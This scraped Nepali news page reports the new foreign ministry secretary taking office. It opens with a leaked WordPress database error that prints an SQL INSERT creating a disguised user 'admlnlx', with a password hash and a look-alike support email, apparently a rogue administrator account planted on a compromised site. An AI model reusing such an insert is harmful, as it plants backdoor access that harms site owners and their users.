WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4JrURhMQPOb0jxuocCIfD9Rv45Q6w0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 09:04:59', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । परराष्ट्र मन्त्रालयका नवनियुक्त सचिव अमृतबहादुर खालिङ राईले पदभार ग्रहण गरेका छन् ।
मंगलबार बसेको मन्त्रिपरिषद बैठकले उनलाई सचिवमा बढुवा गरेपछि बुधबार उनले कार्यभार सम्हालेका हुन् ।
तत्कालीन परराष्ट्र सचिव सेवा लम्साल अवकाश अघि नै बेल्जियमको राजदूतमा सिफारिस भएपछि खालिङ राईलाई कायममुकायम सचिवको जिम्मेवारी दिइएको थियो ।
लम्साल संसदीय समितिबाट अनुमोदन भएर राजदूत नियुक्त भएपछि सरकारले खालिङराईलाई सचिवमा बढुवा गरेको छ ।